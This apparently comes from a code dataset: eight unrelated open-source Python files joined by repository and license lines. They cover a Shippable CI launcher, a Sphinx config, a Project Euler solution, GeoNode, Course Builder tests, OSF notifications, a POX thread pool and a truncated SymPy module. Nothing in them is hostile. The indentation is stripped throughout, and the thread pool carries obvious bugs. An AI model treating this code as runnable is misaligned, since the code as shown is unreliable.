"""CLI tool for starting new Shippable CI runs."""
from __future__ import print_function
# noinspection PyCompatibility
import argparse
import json
import os
import requests
try:
import argcomplete
except ImportError:
argcomplete = None
def main():
"""Main program body."""
api_key = get_api_key()
parser = argparse.ArgumentParser(description='Start a new Shippable run.')
parser.add_argument('project',
metavar='account/project',
help='Shippable account/project')
target = parser.add_mutually_exclusive_group()
target.add_argument('--branch',
help='branch name')
target.add_argument('--run',
metavar='ID',
help='Shippable run ID')
parser.add_argument('--key',
metavar='KEY',
default=api_key,
required=not api_key,
help='Shippable API key')
parser.add_argument('--env',
nargs=2,
metavar=('KEY', 'VALUE'),
action='append',
help='environment variable to pass')
if argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
headers = dict(
Authorization='apiToken %s' % args.key,
)
# get project ID
data = dict(
projectFullNames=args.project,
)
url = 'https://api.shippable.com/projects'
response = requests.get(url, data, headers=headers)
if response.status_code != 200:
raise Exception(response.content)
result = response.json()
if len(result) != 1:
raise Exception(
'Received %d items instead of 1 looking for %s in:\n%s' % (
len(result),
args.project,
json.dumps(result, indent=4, sort_keys=True)))
project_id = response.json()[0]['id']
# new build
data = dict(
globalEnv=dict((kp[0], kp[1]) for kp in args.env or [])
)
if args.branch:
data['branchName'] = args.branch
elif args.run:
data['runId'] = args.run
url = 'https://api.shippable.com/projects/%s/newBuild' % project_id
response = requests.post(url, json=data, headers=headers)
if response.status_code != 200:
raise Exception("HTTP %s: %s\n%s" % (response.status_code, response.reason, response.content))
print(json.dumps(response.json(), indent=4, sort_keys=True))
def get_api_key():
"""
rtype: str
"""
key = os.environ.get('SHIPPABLE_KEY', None)
if key:
return key
path = os.path.join(os.environ['HOME'], '.shippable.key')
try:
with open(path, 'r') as key_fd:
return key_fd.read().strip()
except IOError:
return None
if __name__ == '__main__':
main()
|
gpl-3.0
|
bobthekingofegypt/servo
|
tests/wpt/web-platform-tests/tools/py/doc/conf.py
|
218
|
8482
|
# -*- coding: utf-8 -*-
#
# py documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 21 08:30:10 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'py'
copyright = u'2010, holger krekel et. al.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# The full version, including alpha/beta/rc tags.
import py
release = py.__version__
version = ".".join(release.split(".")[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'py'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'py.tex', u'py Documentation',
u'holger krekel et. al.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'py', u'py Documentation',
[u'holger krekel et. al.'], 1)
]
autodoc_member_order = "bysource"
autodoc_default_flags = "inherited-members"
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'py'
epub_author = u'holger krekel et. al.'
epub_publisher = u'holger krekel et. al.'
epub_copyright = u'2010, holger krekel et. al.'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
mpl-2.0
|
WalrusCow/euler
|
Solutions/problem61.py
|
1
|
2077
|
from collections import defaultdict
def triangle(n):
return int((n * (n + 1)) / 2)
def square(n):
return n * n
def pentagon(n):
return int((n * (3 * n - 1)) / 2)
def hexagon(n):
return n * (2 * n - 1)
def heptagon(n):
return int((n * (5 * n - 3)) / 2)
def octagon(n):
return n * (3 * n - 2)
def find_values_for_digits(first_two, poly_values):
return {poly_num: {last_two for last_two in val_map[first_two]}
for poly_num, val_map in poly_values}
def find_longest_sequence(poly_values, sequence):
if not poly_values:
if sequence[-1] % 100 == sequence[0] // 100:
return sequence
else:
# The ends don't match -- remove the last one :)
return sequence[:-1]
best_sequence = sequence
first_two = sequence[-1] % 100
for poly_num, digit_map in poly_values.items():
for last_two in digit_map[first_two]:
new_sequence = find_longest_sequence(
{p: dm for p, dm in poly_values.items() if p != poly_num},
sequence + [first_two * 100 + last_two],
)
if len(new_sequence) > len(best_sequence):
best_sequence = new_sequence
return best_sequence
if __name__ == '__main__':
poly_funs = [triangle, square, pentagon, hexagon, heptagon, octagon]
poly_values = defaultdict(lambda: defaultdict(set))
for poly_num, poly_fun in enumerate(poly_funs, start=3):
for n in range(1, 10000):
val = poly_fun(n)
if val >= 10000:
break
elif val >= 1000:
poly_values[poly_num][val // 100].add(val % 100)
for first_two, last_twos in poly_values.pop(3).items():
for last_two in last_twos:
sequence = find_longest_sequence(
poly_values,
[first_two * 100 + last_two],
)
if len(sequence) == 6:
print('Sequence: {}'.format(', '.join(map(str, sequence))))
print('Sum is {}'.format(sum(sequence)))
|
mit
|
timlinux/geonode
|
geonode/social/templatetags/social_tags.py
|
5
|
2852
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django import template
from django.utils.translation import ugettext_lazy as _
register = template.Library()
def get_data(action, key, default=None):
"""
Checks for a key in the action's JSON data field. Returns default if the key does not exist.
"""
if hasattr(action, 'data') and action.data:
return action.data.get(key, default)
else:
return default
@register.inclusion_tag('social/_activity_item.html')
def activity_item(action, **kwargs):
"""
Provides a location to manipulate an action in preparation for display.
"""
actor = action.actor
activity_class = 'activity'
verb = action.verb
username = actor.username
target = action.target
object_type = None
object = action.action_object
raw_action = get_data(action, 'raw_action')
object_name = get_data(action, 'object_name')
preposition = _("to")
fragment = None
if object:
object_type = object.__class__._meta.object_name.lower()
if target:
target_type = target.__class__._meta.object_name.lower() # noqa
if actor is None:
return str()
# Set the item's class based on the object.
if object:
if object_type == 'comment':
activity_class = 'comment'
preposition = _("on")
object = None
fragment = "comments"
if object_type == 'map':
activity_class = 'map'
if object_type == 'layer':
activity_class = 'layer'
if raw_action == 'deleted':
activity_class = 'delete'
if raw_action == 'created' and object_type == 'layer':
activity_class = 'upload'
ctx = dict(
activity_class=activity_class,
action=action,
actor=actor,
object=object,
object_name=object_name,
preposition=preposition,
target=target,
timestamp=action.timestamp,
username=username,
verb=verb,
fragment=fragment
)
return ctx
|
gpl-3.0
|
ram8647/gcb-mobilecsp
|
modules/questionnaire/questionnaire_tests.py
|
4
|
9221
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the questionnaire module."""
__author__ = 'Neema Kotonya ([email protected])'
from common import crypto
from controllers import sites
from models import courses
from models import models
from models import transforms
from models.data_sources import utils as data_sources_utils
from modules.questionnaire.questionnaire import QuestionnaireDataSource
from modules.questionnaire.questionnaire import StudentFormEntity
from tests.functional import actions
from google.appengine.api import namespace_manager
COURSE_NAME = 'questionnaire_tag_test_course'
ADMIN_EMAIL = '[email protected]'
UNIQUE_FORM_ID = 'This-is-the-unique-id-for-this-form'
STUDENT_EMAIL = '[email protected]'
STUDENT_NAME = 'A. Test Student'
TEST_FORM_HTML = """
<form id="This-is-the-unique-id-for-this-form">
Course Name: <input name="course_name" type="text" value=""><br>
Unit Name: <input name="unit_name" type="text" value=""><br>
</form>"""
QUESTIONNAIRE_TAG = """
<gcb-questionnaire
form-id="This-is-the-unique-id-for-this-form"
instanceid="hnWDW6Ld4RdO">
</gcb-questionnaire><br>
"""
class BaseQuestionnaireTests(actions.TestBase):
"""Tests for REST endpoint and tag renderer."""
def setUp(self):
super(BaseQuestionnaireTests, self).setUp()
actions.login(ADMIN_EMAIL, is_admin=True)
self.base = '/' + COURSE_NAME
test_course = actions.simple_add_course(
COURSE_NAME, ADMIN_EMAIL, 'Questionnaire Test Course')
self.old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace('ns_%s' % COURSE_NAME)
self.course = courses.Course(None, test_course)
test_unit = self.course.add_unit()
test_unit.availability = courses.AVAILABILITY_AVAILABLE
test_lesson = self.course.add_lesson(test_unit)
test_lesson.availability = courses.AVAILABILITY_AVAILABLE
test_lesson.title = 'This is a lesson that contains a form.'
test_lesson.objectives = '%s\n%s' % (TEST_FORM_HTML, QUESTIONNAIRE_TAG)
self.unit_id = test_unit.unit_id
self.lesson_id = test_lesson.lesson_id
self.course.save()
actions.logout()
def tearDown(self):
del sites.Registry.test_overrides[sites.GCB_COURSES_CONFIG.name]
namespace_manager.set_namespace(self.old_namespace)
super(BaseQuestionnaireTests, self).tearDown()
def get_button(self):
dom = self.parse_html_string(self.get('unit?unit=%s&lesson=%s' % (
self.unit_id, self.lesson_id)).body)
return dom.find('.//button[@class="gcb-button questionnaire-button"]')
def register(self):
user = actions.login(STUDENT_EMAIL, is_admin=False)
actions.register(self, STUDENT_NAME)
return models.Student.get_enrolled_student_by_user(user)
class QuestionnaireTagTests(BaseQuestionnaireTests):
def test_submit_answers_button_out_of_session(self):
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('false', button.attrib['data-registered'])
def test_submit_answers_button_in_session_no_student(self):
actions.login(STUDENT_EMAIL, is_admin=False)
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('false', button.attrib['data-registered'])
def test_submit_answers_button_student_in_session(self):
actions.login(STUDENT_EMAIL, is_admin=False)
actions.register(self, STUDENT_NAME)
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('true', button.attrib.get('data-registered'))
class QuestionnaireRESTHandlerTests(BaseQuestionnaireTests):
REST_URL = 'rest/modules/questionnaire'
PAYLOAD_DICT = {
'form_data': [
{u'query': u''},
{u'course_name': u'course_name'},
{u'unit_name': u'unit_name'}]}
def _post_form_to_rest_handler(self, request_dict):
return transforms.loads(self.post(
self.REST_URL,
{'request': transforms.dumps(request_dict)}).body)
def _get_rest_request(self, payload_dict):
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
'questionnaire')
return {
'xsrf_token': xsrf_token,
'payload': payload_dict
}
def _put_data_in_datastore(self, student):
data = StudentFormEntity.load_or_default(student, UNIQUE_FORM_ID)
data.value = transforms.dumps(self.PAYLOAD_DICT)
data.put()
return data.value
def test_rest_handler_right_data_retrieved(self):
self.register()
response = self._post_form_to_rest_handler(
self._get_rest_request(self.PAYLOAD_DICT))
self.assertEquals(200, response['status'])
def test_rest_handler_requires_xsrf(self):
response = self._post_form_to_rest_handler({'xsrf_token': 'BAD TOKEN'})
self.assertEquals(403, response['status'])
def test_rest_handler_only_allows_enrolled_user_to_submit(self):
response = self._post_form_to_rest_handler(self._get_rest_request({}))
self.assertEquals(401, response['status'])
self.register()
response = self._post_form_to_rest_handler(self._get_rest_request({}))
self.assertEquals(200, response['status'])
def test_form_data_in_datastore(self):
student = self.register()
self._put_data_in_datastore(student)
response = StudentFormEntity.load_or_default(student, UNIQUE_FORM_ID)
self.assertNotEqual(None, response)
def test_form_data_can_be_retrieved(self):
student = self.register()
self._put_data_in_datastore(student)
response = self._get_rest_request(self.PAYLOAD_DICT)
self.assertEquals(self.PAYLOAD_DICT, response['payload'])
class QuestionnaireDataSourceTests(BaseQuestionnaireTests):
FORM_0_DATA = [
{u'name': u'title', u'value': u'War and Peace'},
{u'name': u'rating', u'value': u'Long'}]
FORM_1_DATA = [
{u'name': u'country', u'value': u'Greece'},
{u'name': u'lang', u'value': u'el_EL'},
{u'name': u'tld', u'value': u'el'}]
# Form 2 tests malformed data
FORM_2_DATA = [
{u'value': u'value without name'}, # missing 'name' field
{u'name': u'name without value'}, # missing 'value' field
{u'name': u'numeric', u'value': 3.14}] # non-string value
FORM_2_DATA_OUT = [
{u'name': None, u'value': u'value without name'},
{u'name': u'name without value', u'value': None},
{u'name': u'numeric', u'value': u'3.14'}]
def test_data_extraction(self):
# Register a student and save some form values for that student
student = self.register()
entity = StudentFormEntity.load_or_default(student, 'form-0')
entity.value = transforms.dumps({
u'form_data': self.FORM_0_DATA})
entity.put()
entity = StudentFormEntity.load_or_default(student, u'form-1')
entity.value = transforms.dumps({
u'form_data': self.FORM_1_DATA})
entity.put()
entity = StudentFormEntity.load_or_default(student, u'form-2')
entity.value = transforms.dumps({
u'form_data': self.FORM_2_DATA})
entity.put()
# Log in as admin for the data query
actions.logout()
actions.login(ADMIN_EMAIL, is_admin=True)
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
data_sources_utils.DATA_SOURCE_ACCESS_XSRF_ACTION)
pii_secret = crypto.generate_transform_secret_from_xsrf_token(
xsrf_token, data_sources_utils.DATA_SOURCE_ACCESS_XSRF_ACTION)
safe_user_id = crypto.hmac_sha_2_256_transform(
pii_secret, student.user_id)
response = self.get(
'rest/data/questionnaire_responses/items?'
'data_source_token=%s&page_number=0' % xsrf_token)
data = transforms.loads(response.body)['data']
self.assertEqual(3, len(data))
for index in range(3):
self.assertIn(safe_user_id, data[index]['user_id'])
self.assertEqual('form-%s' % index, data[index]['questionnaire_id'])
self.assertEqual(self.FORM_0_DATA, data[0]['form_data'])
self.assertEqual(self.FORM_1_DATA, data[1]['form_data'])
self.assertEqual(self.FORM_2_DATA_OUT, data[2]['form_data'])
def test_exportable(self):
self.assertTrue(QuestionnaireDataSource.exportable())
|
apache-2.0
|
asanfilippo7/osf.io
|
website/notifications/emails.py
|
15
|
6935
|
from babel import dates, core, Locale
from website import mails
from website import models as website_models
from website.notifications import constants
from website.notifications import utils
from website.notifications.model import NotificationDigest
from website.notifications.model import NotificationSubscription
from website.util import web_url_for
def notify(event, user, node, timestamp, **context):
"""Retrieve appropriate ***subscription*** and passe user list
:param event: event that triggered the notification
:param user: user who triggered notification
:param node: instance of Node
:param timestamp: time event happened
:param context: optional variables specific to templates
target_user: used with comment_replies
:return: List of user ids notifications were sent to
"""
event_type = utils.find_subscription_type(event)
subscriptions = compile_subscriptions(node, event_type, event)
sent_users = []
target_user = context.get('target_user', None)
if target_user:
target_user_id = target_user._id
if event_type in constants.USER_SUBSCRIPTIONS_AVAILABLE:
subscriptions = get_user_subscriptions(target_user, event_type)
for notification_type in subscriptions:
if notification_type != 'none' and subscriptions[notification_type]:
if user in subscriptions[notification_type]:
subscriptions[notification_type].pop(subscriptions[notification_type].index(user))
if target_user and target_user_id in subscriptions[notification_type]:
subscriptions[notification_type].pop(subscriptions[notification_type].index(target_user_id))
if target_user_id != user._id:
store_emails([target_user_id], notification_type, 'comment_replies', user, node,
timestamp, **context)
sent_users.append(target_user_id)
if subscriptions[notification_type]:
store_emails(subscriptions[notification_type], notification_type, event_type, user, node,
timestamp, **context)
sent_users.extend(subscriptions[notification_type])
return sent_users
def store_emails(recipient_ids, notification_type, event, user, node, timestamp, **context):
"""Store notification emails
Emails are sent via celery beat as digests
:param recipient_ids: List of user ids to send mail to.
:param notification_type: from constants.Notification_types
:param event: event that triggered notification
:param user: user who triggered the notification
:param node: instance of Node
:param timestamp: time event happened
:param context:
:return: --
"""
if notification_type == 'none':
return
template = event + '.html.mako'
context['user'] = user
node_lineage_ids = get_node_lineage(node) if node else []
for user_id in recipient_ids:
if user_id == user._id:
continue
recipient = website_models.User.load(user_id)
context['localized_timestamp'] = localize_timestamp(timestamp, recipient)
message = mails.render_message(template, **context)
digest = NotificationDigest(
timestamp=timestamp,
send_type=notification_type,
event=event,
user_id=user_id,
message=message,
node_lineage=node_lineage_ids
)
digest.save()
def compile_subscriptions(node, event_type, event=None, level=0):
"""Recurse through node and parents for subscriptions.
:param node: current node
:param event_type: Generally node_subscriptions_available
:param event: Particular event such a file_updated that has specific file subs
:param level: How deep the recursion is
:return: a dict of notification types with lists of users.
"""
subscriptions = check_node(node, event_type)
if event:
subscriptions = check_node(node, event) # Gets particular event subscriptions
parent_subscriptions = compile_subscriptions(node, event_type, level=level + 1) # get node and parent subs
elif node.parent_id:
parent_subscriptions = \
compile_subscriptions(website_models.Node.load(node.parent_id), event_type, level=level + 1)
else:
parent_subscriptions = check_node(None, event_type)
for notification_type in parent_subscriptions:
p_sub_n = parent_subscriptions[notification_type]
p_sub_n.extend(subscriptions[notification_type])
for nt in subscriptions:
if notification_type != nt:
p_sub_n = list(set(p_sub_n).difference(set(subscriptions[nt])))
if level == 0:
p_sub_n, removed = utils.separate_users(node, p_sub_n)
parent_subscriptions[notification_type] = p_sub_n
return parent_subscriptions
def check_node(node, event):
"""Return subscription for a particular node and event."""
node_subscriptions = {key: [] for key in constants.NOTIFICATION_TYPES}
if node:
subscription = NotificationSubscription.load(utils.to_subscription_key(node._id, event))
for notification_type in node_subscriptions:
users = getattr(subscription, notification_type, [])
for user in users:
if node.has_permission(user, 'read'):
node_subscriptions[notification_type].append(user._id)
return node_subscriptions
def get_user_subscriptions(user, event):
user_subscription = NotificationSubscription.load(utils.to_subscription_key(user._id, event))
return {key: getattr(user_subscription, key, []) for key in constants.NOTIFICATION_TYPES}
def get_node_lineage(node):
""" Get a list of node ids in order from the node to top most project
e.g. [parent._id, node._id]
"""
lineage = [node._id]
while node.parent_id:
node = website_models.Node.load(node.parent_id)
lineage = [node._id] + lineage
return lineage
def get_settings_url(uid, user):
if uid == user._id:
return web_url_for('user_notifications', _absolute=True)
node = website_models.Node.load(uid)
assert node, 'get_settings_url recieved an invalid Node id'
return node.web_url_for('node_setting', _guid=True, _absolute=True)
def localize_timestamp(timestamp, user):
try:
user_timezone = dates.get_timezone(user.timezone)
except LookupError:
user_timezone = dates.get_timezone('Etc/UTC')
try:
user_locale = Locale(user.locale)
except core.UnknownLocaleError:
user_locale = 'en'
formatted_date = dates.format_date(timestamp, format='full', locale=user_locale)
formatted_time = dates.format_time(timestamp, format='short', tzinfo=user_timezone, locale=user_locale)
return u'{time} on {date}'.format(time=formatted_time, date=formatted_date)
|
apache-2.0
|
XianliangJ/collections
|
Jellyfish/pox/pox/lib/threadpool.py
|
6
|
2913
|
# Copyright 2012 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Totally untested thread pool class.
Tries to not get more than "maximum" (but this is not a hard limit).
Kills off up to around half of its workers when more than half are idle.
"""
from __future__ import with_statement
from threading import Thread, RLock
from Queue import Queue
CYCLE_TIME = 3
class WorkerThread (Thread):
def __init__ (self, pool):
Thread.__init__(self)
self._pool = pool
self.daemon = True
self.start()
def run (self):
with self._pool._lock:
self._pool._total += 1
while self._pool.running:
with self._pool._lock:
self._pool._available += 1
try:
func, args, kw = self._pool._tasks.get(True, CYCLE_TIME)
if func is None: return
except:
continue
finally:
with self._pool._lock:
self._pool._available -= 1
assert self._pool._available >= 0
try:
func(*args, **kw)
except Exception as e:
print "Worker thread exception", e
self._pool._tasks.task_done()
with self._pool._lock:
self._pool._total -= 1
assert self._pool._total >= 0
class ThreadPool (object):
#NOTE: Assumes only one thread manipulates the pool
# (Add some locks to fix)
def __init__ (self, initial = 0, maximum = None):
self._available = 0
self._total = 0
self._tasks = Queue()
self.maximum = maximum
self._lock = RLock()
for i in xrange(initial):
self._new_worker
def _new_worker (self):
with self._lock:
if self.maximum is not None:
if self._total >= self.maximum:
# Too many!
return False
WorkerThread(self)
return True
def add (_self, _func, *_args, **_kwargs):
self.add_task(_func, args=_args, kwargs=_kwargs)
def add_task (self, func, args=(), kwargs={}):
while True:
self._lock.acquire()
if self._available == 0:
self._lock.release()
self._new_worker()
else:
break
self._tasks.put((func, args, kwargs))
if self.available > self._total / 2 and self.total > 8:
for i in xrange(self._total / 2 - 1):
self._tasks.put((None,None,None))
self._lock.release()
def join (self):
self._tasks.join()
|
gpl-3.0
|
kaichogami/sympy
|
sympy/tensor/indexed.py
|
12
|
17230
|
"""Module that defines indexed objects
The classes IndexedBase, Indexed and Idx would represent a matrix element
M[i, j] as in the following graph::
1) The Indexed class represents the entire indexed object.
|
___|___
' '
M[i, j]
/ \__\______
| |
| |
| 2) The Idx class represent indices and each Idx can
| optionally contain information about its range.
|
3) IndexedBase represents the `stem' of an indexed object, here `M'.
The stem used by itself is usually taken to represent the entire
array.
There can be any number of indices on an Indexed object. No
transformation properties are implemented in these Base objects, but
implicit contraction of repeated indices is supported.
Note that the support for complicated (i.e. non-atomic) integer
expressions as indices is limited. (This should be improved in
future releases.)
Examples
========
To express the above matrix element example you would write:
>>> from sympy.tensor import IndexedBase, Idx
>>> from sympy import symbols
>>> M = IndexedBase('M')
>>> i, j = symbols('i j', cls=Idx)
>>> M[i, j]
M[i, j]
Repeated indices in a product implies a summation, so to express a
matrix-vector product in terms of Indexed objects:
>>> x = IndexedBase('x')
>>> M[i, j]*x[j]
x[j]*M[i, j]
If the indexed objects will be converted to component based arrays, e.g.
with the code printers or the autowrap framework, you also need to provide
(symbolic or numerical) dimensions. This can be done by passing an
optional shape parameter to IndexedBase upon construction:
>>> dim1, dim2 = symbols('dim1 dim2', integer=True)
>>> A = IndexedBase('A', shape=(dim1, 2*dim1, dim2))
>>> A.shape
(dim1, 2*dim1, dim2)
>>> A[i, j, 3].shape
(dim1, 2*dim1, dim2)
If an IndexedBase object has no shape information, it is assumed that the
array is as large as the ranges of its indices:
>>> n, m = symbols('n m', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', n)
>>> M[i, j].shape
(m, n)
>>> M[i, j].ranges
[(0, m - 1), (0, n - 1)]
The above can be compared with the following:
>>> A[i, 2, j].shape
(dim1, 2*dim1, dim2)
>>> A[i, 2, j].ranges
[(0, m - 1), None, (0, n - 1)]
To analyze the structure of indexed expressions, you can use the methods
get_indices() and get_contraction_structure():
>>> from sympy.tensor import get_indices, get_contraction_structure
>>> get_indices(A[i, j, j])
(set([i]), {})
>>> get_contraction_structure(A[i, j, j])
{(j,): set([A[i, j, j]])}
See the appropriate docstrings for a detailed explanation of the output.
"""
# TODO: (some ideas for improvement)
#
# o test and guarantee numpy compatibility
# - implement full support for broadcasting
# - strided arrays
#
# o more functions to analyze indexed expressions
# - identify standard constructs, e.g matrix-vector product in a subexpression
#
# o functions to generate component based arrays (numpy and sympy.Matrix)
# - generate a single array directly from Indexed
# - convert simple sub-expressions
#
# o sophisticated indexing (possibly in subclasses to preserve simplicity)
# - Idx with range smaller than dimension of Indexed
# - Idx with stepsize != 1
# - Idx with step determined by function call
from __future__ import print_function, division
from sympy.core import Expr, Tuple, Symbol, sympify, S
from sympy.core.compatibility import is_sequence, string_types, NotIterable, range
class IndexException(Exception):
pass
class Indexed(Expr):
"""Represents a mathematical object with indices.
>>> from sympy.tensor import Indexed, IndexedBase, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j)
A[i, j]
It is recommended that Indexed objects are created via IndexedBase:
>>> A = IndexedBase('A')
>>> Indexed('A', i, j) == A[i, j]
True
"""
is_commutative = True
def __new__(cls, base, *args):
from sympy.utilities.misc import filldedent
if not args:
raise IndexException("Indexed needs at least one index.")
if isinstance(base, (string_types, Symbol)):
base = IndexedBase(base)
elif not hasattr(base, '__getitem__') and not isinstance(base, IndexedBase):
raise TypeError(filldedent("""
Indexed expects string, Symbol or IndexedBase as base."""))
args = list(map(sympify, args))
return Expr.__new__(cls, base, *args)
@property
def base(self):
"""Returns the IndexedBase of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, IndexedBase, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j).base
A
>>> B = IndexedBase('B')
>>> B == B[i, j].base
True
"""
return self.args[0]
@property
def indices(self):
"""
Returns the indices of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j).indices
(i, j)
"""
return self.args[1:]
@property
def rank(self):
"""
Returns the rank of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, Idx
>>> from sympy import symbols
>>> i, j, k, l, m = symbols('i:m', cls=Idx)
>>> Indexed('A', i, j).rank
2
